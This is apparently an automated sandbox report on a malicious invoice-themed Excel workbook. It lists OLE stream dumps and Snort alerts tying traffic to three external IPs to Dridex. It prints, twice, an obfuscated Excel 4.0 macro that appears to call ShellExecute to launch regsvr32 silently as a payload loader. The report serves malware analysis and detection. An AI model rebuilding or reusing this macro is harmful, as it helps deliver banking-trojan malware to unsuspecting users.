Data Raw:	93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00

Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 187

General
Stream Path:	VBA/__SRP_1
File Type:	data
Stream Size:	187
Entropy:	1.91493173134
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w q . . . . . . . . . . . . . . . . n i m o . . . . . . . . . . . . . . . . y e l ^ . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 02 00 00 00 00 00 00 08 02 00 00 00 00 00

Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 363

General
Stream Path:	VBA/__SRP_2
File Type:	data
Stream Size:	363
Entropy:	2.21122978445
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff

Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 398

General
Stream Path:	VBA/__SRP_3
File Type:	data
Stream Size:	398
Entropy:	2.07709195049
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . q . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00

Stream Path: VBA/dir, File Type: data, Stream Size: 820

General
Stream Path:	VBA/dir
File Type:	data
Stream Size:	820
Entropy:	6.49145935167
Base64 Encoded:	True
Data ASCII:	. 0 . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
Data Raw:	01 30 b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 09 a2 eb 61 05 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Macro 4.0 Code

CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)

"=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()

OLE File "/opt/package/joesandbox/database/analysis/338095/sample/INV9698791470-20210111920647.xlsm"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	False
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Summary
Author:
Last Saved By:
Create Time:	2020-12-07T14:38:21Z
Last Saved Time:	2021-01-11T14:32:26Z
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Thumbnail Scaling Desired:	false
Company:
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	16.0300

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 115

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	115
Entropy:	4.80096587863
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . p . . F z ? . . . . . . . a . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . M u l t i P a g e . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 70 13 e3 46 7a 3f ce 11 be d6 00 aa 00 61 10 80 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 12 00 00 00 46 6f 72 6d 73 2e 4d 75 6c 74 69 50 61 67 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: f, File Type: data, Stream Size: 178

General
Stream Path:	f
File Type:	data
Stream Size:	178
Entropy:	2.56223021678
Base64 Encoded:	False
Data ASCII:	. . $ . H . . . . . . . . @ . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . . . . . . . . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . . # . . . . . . . P a g e 1 . . . . . . . . . . . . . $ . . . . . . . . . . . . . ! . . . . . . . P a g e 2 . . . 5 . . . . . . . . . . . . . . . T . . .
Data Raw:	00 04 24 00 48 0c 00 0c 03 00 00 00 04 40 00 00 04 00 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 74 00 00 00 00 83 01 00 00 00 1c 00 f4 01 00 00 01 00 00 00 32 00 00 00 98 00 00 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 24 00 d5 01 00 00 05 00 00 80 02 00 00 00 23 00 04 00 01 00 07 00 50 61 67 65 31 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: i02/\x1CompObj, File Type: data, Stream Size: 110

General
Stream Path:	i02/\x1CompObj
File Type:	data
Stream Size:	110
Entropy:	4.63372611993
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: i02/f, File Type: data, Stream Size: 40

General
Stream Path:	i02/f
File Type:	data
Stream Size:	40
Entropy:	1.54176014818
Base64 Encoded:	False
Data ASCII:	. . . . @ . . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: i02/o, File Type: empty, Stream Size: 0

General
Stream Path:	i02/o
File Type:	empty
Stream Size:	0
Entropy:	0.0
Base64 Encoded:	False
Data ASCII:
Data Raw:

Stream Path: i03/\x1CompObj, File Type: data, Stream Size: 110

General
Stream Path:	i03/\x1CompObj
File Type:	data
Stream Size:	110
Entropy:	4.63372611993
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: i03/f, File Type: data, Stream Size: 40

General
Stream Path:	i03/f
File Type:	data
Stream Size:	40
Entropy:	1.90677964945
Base64 Encoded:	False
Data ASCII:	. . . . @ . . . . . . . . } . . n . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 6e 13 00 00 fd 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: i03/o, File Type: empty, Stream Size: 0

General
Stream Path:	i03/o
File Type:	empty
Stream Size:	0
Entropy:	0.0
Base64 Encoded:	False
Data ASCII:
Data Raw:

Stream Path: o, File Type: data, Stream Size: 152

General
Stream Path:	o
File Type:	data
Stream Size:	152
Entropy:	2.68720470607
Base64 Encoded:	False
Data ASCII:	. . p . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P a g e 1 . . . . . . . P a g e 2 . . . . . . . . . . . . . . . T a b 3 . . . . T a b 4 . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i . . . . . . . . .
Data Raw:	00 02 70 00 31 82 fa 00 00 00 00 00 18 00 00 00 02 00 00 00 08 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 02 00 00 00 08 00 00 00 84 00 00 00 84 00 00 00 05 00 00 80 50 61 67 65 31 00 00 00 05 00 00 80 50 61 67 65 32 00 00 00 00 00 00 00 00 00 00 00 04 00 00 80 54 61 62 33 04 00 00 80 54 61 62 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 07 00 00 80

Stream Path: x, File Type: data, Stream Size: 48

General
Stream Path:	x
File Type:	data
Stream Size:	48
Entropy:	1.42267983198
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 0c 00 06 00 00 00 02 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00

Macro 4.0 Code

CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)

"=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/11/21-16:52:15.334491	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49168	77.220.64.37	192.168.2.22
01/11/21-16:52:17.859938	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49170	80.86.91.27	192.168.2.22
01/11/21-16:52:18.808894	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49171	5.100.228.233	192.168.2.22
01/11/21-16:52:18.808894	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49171	5.100.228.233	192.168.2.22
01/11/21-16:52:20.144718	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49173	77.220.64.37	192.168.2.22
01/11/21-16:52:20.675955	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49174	80.86.91.27	192.168.2.22
01/11/21-16:52:21.214869	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49175	5.100.228.233	192.168.2.22
01/11/21-16:52:21.214869	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49175	5.100.228.233	192.168.2.22
01/11/21-16:52:22.272887	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49177	77.220.64.37	192.168.2.22
01/11/21-16:52:22.794837	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49178	80.86.91.27	192.168.2.22
01/11/21-16:52:23.323486	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49179	5.100.228.233	192.168.2.22
01/11/21-16:52:23.323486	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49179	5.100.228.233	192.168.2.22
01/11/21-16:52:24.377834	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49181	77.220.64.37	192.168.2.22
01/11/21-16:52:24.901149	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49182	80.86.91.27	192.168.2.22
01/11/21-16:52:25.418198	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49183	5.100.228.233	192.168.2.22
01/11/21-16:52:25.418198	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49183	5.100.228.233	192.168.2.22
01/11/21-16:52:26.483845	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49185	77.220.64.37	192.168.2.22
01/11/21-16:52:27.011541	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49186	80.86.91.27	192.168.2.22
01/11/21-16:52:27.531506	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49187	5.100.228.233	192.168.2.22
01/11/21-16:52:27.531506	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49187	5.100.228.233	192.168.2.22
01/11/21-16:52:28.591475	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49189	77.220.64.37	192.168.2.22
01/11/21-16:52:29.110597	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49190	80.86.91.27	192.168.2.22
01/11/21-16:52:29.628147	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49191	5.100.228.233	192.168.2.22
01/11/21-16:52:29.628147	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49191	5.100.228.233	192.168.2.22
01/11/21-16:52:30.659602	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49193	77.220.64.37	192.168.2.22
01/11/21-16:52:31.192506	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49194	80.86.91.27	192.168.2.22
01/11/21-16:52:31.707272	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49195	5.100.228.233	192.168.2.22
01/11/21-16:52:31.707272	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49195	5.100.228.233	192.168.2.22
01/11/21-16:52:32.743416	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49197	77.220.64.37	192.168.2.22
01/11/21-16:52:33.263684	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49198	80.86.91.27	192.168.2.22
01/11/21-16:52:33.795014	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49199	5.100.228.233	192.168.2.22
01/11/21-16:52:33.795014	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49199	5.100.228.233	192.168.2.22
01/11/21-16:52:34.824404	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49201	77.220.64.37	192.168.2.22
01/11/21-16:52:35.475034	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49202	80.86.91.27	192.168.2.22
01/11/21-16:52:36.272130	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49203	5.100.228.233	192.168.2.22
01/11/21-16:52:36.272130	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49203	5.100.228.233	192.168.2.22
01/11/21-16:52:38.580311	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49205	77.220.64.37	192.168.2.22
01/11/21-16:52:39.358046	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49206	80.86.91.27	192.168.2.22
01/11/21-16:52:39.901624	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49207	5.100.228.233	192.168.2.22
01/11/21-16:52:39.901624	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49207	5.100.228.233	192.168.2.22
01/11/21-16:52:40.914675	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49209	77.220.64.37	192.168.2.22
01/11/21-16:52:41.429806	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49210	80.86.91.27	192.168.2.22
01/11/21-16:52:41.945066	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49211	5.100.228.233	192.168.2.22
01/11/21-16:52:41.945066	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49211	5.100.228.233	192.168.2.22
01/11/21-16:52:42.972027	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49213	77.220.64.37	192.168.2.22
01/11/21-16:52:43.484764	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49214	80.86.91.27	192.168.2.22
01/11/21-16:52:43.994555	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49215	5.100.228.233	192.168.2.22
01/11/21-16:52:43.994555	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49215	5.100.228.233	192.168.2.22
01/11/21-16:52:45.013259	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49217	77.220.64.37	192.168.2.22
01/11/21-16:52:45.528690	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49218	80.86.91.27	192.168.2.22
01/11/21-16:52:46.062422	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49219	5.100.228.233	192.168.2.22
01/11/21-16:52:46.062422	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49219	5.100.228.233	192.168.2.22
01/11/21-16:52:47.122773	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49221	77.220.64.37	192.168.2.22
01/11/21-16:52:47.627454	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49222	80.86.91.27	192.168.2.22
01/11/21-16:52:48.129225	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49223	5.100.228.233	192.168.2.22
01/11/21-16:52:48.129225	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49223	5.100.228.233	192.168.2.22
01/11/21-16:52:49.165604	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49226	77.220.64.37	192.168.2.22
01/11/21-16:52:49.670559	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49228	80.86.91.27	192.168.2.22
01/11/21-16:52:50.246739	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49229	5.100.228.233	192.168.2.22
01/11/21-16:52:50.246739	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49229	5.100.228.233	192.168.2.22
01/11/21-16:52:51.330600	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49231	77.220.64.37	192.168.2.22
01/11/21-16:52:51.851557	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49232	80.86.91.27	192.168.2.22
01/11/21-16:52:52.353121	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49233	5.100.228.233	192.168.2.22
01/11/21-16:52:52.353121	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49233	5.100.228.233	192.168.2.22
01/11/21-16:52:53.496805	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49235	77.220.64.37	192.168.2.22
01/11/21-16:52:54.115599	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49236	80.86.91.27	192.168.2.22
01/11/21-16:52:54.990514	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49237	5.100.228.233	192.168.2.22
01/11/21-16:52:54.990514	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49237	5.100.228.233	192.168.2.22
01/11/21-16:52:56.130653	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49239	77.220.64.37	192.168.2.22
01/11/21-16:52:56.659494	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49240	80.86.91.27	192.168.2.22
01/11/21-16:52:57.182169	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49241	5.100.228.233	192.168.2.22
01/11/21-16:52:57.182169	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49241	5.100.228.233	192.168.2.22
01/11/21-16:52:58.192353	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49243	77.220.64.37	192.168.2.22
01/11/21-16:52:58.701529	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49244	80.86.91.27	192.168.2.22
01/11/21-16:52:59.229429	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49245	5.100.228.233	192.168.2.22
01/11/21-16:52:59.229429	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49245	5.100.228.233	192.168.2.22
01/11/21-16:53:00.251308	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49247	77.220.64.37	192.168.2.22
01/11/21-16:53:00.759616	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49248	80.86.91.27	192.168.2.22
01/11/21-16:53:01.274327	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49249	5.100.228.233	192.168.2.22
01/11/21-16:53:01.274327	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49249	5.100.228.233	192.168.2.22
01/11/21-16:53:02.306617	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49251	77.220.64.37	192.168.2.22
01/11/21-16:53:02.818243	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49252	80.86.91.27	192.168.2.22
01/11/21-16:53:03.360060	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49253	5.100.228.233	192.168.2.22
01/11/21-16:53:03.360060	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49253	5.100.228.233	192.168.2.22
01/11/21-16:53:04.397885	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49255	77.220.64.37	192.168.2.22
01/11/21-16:53:04.893611	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49256	80.86.91.27	192.168.2.22
01/11/21-16:53:05.419481	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49257	5.100.228.233	192.168.2.22
01/11/21-16:53:05.419481	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49257	5.100.228.233	192.168.2.22
01/11/21-16:53:06.462219	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49259	77.220.64.37	192.168.2.22
01/11/21-16:53:06.979873	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49260	80.86.91.27	192.168.2.22
01/11/21-16:53:07.492309	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49261	5.100.228.233	192.168.2.22
01/11/21-16:53:07.492309	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49261	5.100.228.233	192.168.2.22
